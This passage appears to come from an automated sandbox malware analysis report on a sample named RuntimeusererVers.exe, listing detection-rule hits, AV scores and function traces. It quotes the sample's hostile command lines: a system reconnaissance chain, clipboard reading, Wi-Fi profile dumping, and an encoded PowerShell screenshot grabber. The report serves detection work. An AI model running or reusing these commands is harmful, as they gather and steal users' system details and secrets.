Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4428, ProcessName: net.exe
                      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4428, ProcessName: net.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 5884, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 1240, ProcessName: sc.exe
                      Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7460, ProcessName: HOSTNAME.EXE
                      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User I

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF

                      Stealing of Sensitive Information

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 5228, ProcessName: cmd.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeReversingLabs: Detection: 39%
                      Source: RuntimeusererVers.exeReversingLabs: Detection: 39%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: geolocation-db.com
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08222A CRYPTO_free,48_2_00007FF81E08222A
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E082225 CRYPTO_free,CRYPTO_memdup,48_2_00007FF81E082225
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08101E CRYPTO_free,CRYPTO_free,48_2_00007FF81E08101E
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0E0830 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,48_2_00007FF81E0E0830
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0C0820 CRYPTO_free,CRYPTO_free,48_2_00007FF81E0C0820
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0BA850 CRYPTO_free,CRYPTO_memdup,48_2_00007FF81E0BA850
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081C08 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,48_2_00007FF81E081C08
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0C883B CRYPTO_clear_free,48_2_00007FF81E0C883B
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08135C memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,48_2_00007FF81E08135C
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081DD4 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_size,48_2_00007FF81E081DD4
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0C0550 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,48_2_00007FF81E0C0550
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081438 ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,48_2_00007FF81E081438
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081050 EVP_PKEY_free,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_clear_free,48_2_00007FF81E081050
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081BCC CRYPTO_strdup,CRYPTO_free,48_2_00007FF81E081BCC
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08236A CRYPTO_free,CRYPTO_malloc,ERR_put_error,memcpy,48_2_00007FF81E08236A
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0BA5E0 CRYPTO_memcmp,48_2_00007FF81E0BA5E0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081762 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error,48_2_00007FF81E081762
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0821C1 _time64,CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free,CRYPTO_free,48_2_00007FF81E0821C1
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0846C0 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,48_2_00007FF81E0846C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E096330 CRYPTO_free,48_2_00007FF81E096330
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0D2350 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,48_2_00007FF81E0D2350
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081CBC CRYPTO_clear_free,48_2_00007FF81E081CBC
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E09E3C0 CRYPTO_THREAD_run_once,48_2_00007FF81E09E3C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0983F0 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free,48_2_00007FF81E0983F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E088410 CRYPTO_zalloc,ERR_put_error,48_2_00007FF81E088410
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081E7E CRYPTO_free,CRYPTO_malloc,48_2_00007FF81E081E7E
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081A00 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,48_2_00007FF81E081A00
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E084497 CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags,48_2_00007FF81E084497
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081F14 CRYPTO_free,48_2_00007FF81E081F14
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E082414 CRYPTO_free,BIO_clear_flags,BIO_set_flags,BIO_snprintf,ERR_add_error_data,memcpy,48_2_00007FF81E082414
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0822C5 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error,48_2_00007FF81E0822C5
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0884C0 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,48_2_00007FF81E0884C0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0A24E0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,48_2_00007FF81E0A24E0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E098130 CRYPTO_free,CRYPTO_memdup,48_2_00007FF81E098130
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08195B EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,strncmp,strncmp,strncmp,strncmp,strncmp,48_2_00007FF81E08195B
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E082590 CRYPTO_free,CRYPTO_strdup,48_2_00007FF81E082590
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E09E180 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl,48_2_00007FF81E09E180
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0961F8 CRYPTO_free,CRYPTO_strdup,48_2_00007FF81E0961F8
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E081131 CRYPTO_free,48_2_00007FF81E081131
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E09C280 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,48_2_00007FF81E09C280
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0D42B0 CRYPTO_malloc,memcpy,48_2_00007FF81E0D42B0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E082293 CRYPTO_free,CRYPTO_memdup,48_2_00007FF81E082293
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0A62F0 ERR_put_error,CRYPTO_free,ERR_put_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,48_2_00007FF81E0A62F0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0813B6 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,48_2_00007FF81E0813B6
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E08E2E0 CRYPTO_malloc,48_2_00007FF81E08E2E0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E0820FE BN_bin2bn,BN_is_zero,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free,48_2_00007FF81E0820FE
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E18A0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,48_2_00007FF81E4E18A0
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E4E6124 CRYPTO_memcmp,48_2_00007FF81E4E6124

                      Phishing

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administratorJump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: RuntimeusererVers.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\bcrypt\bcrypt\bcrypt-4.0.1\src\_bcrypt\target\x86_64-pc-windows-msvc\release\deps\bcrypt_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
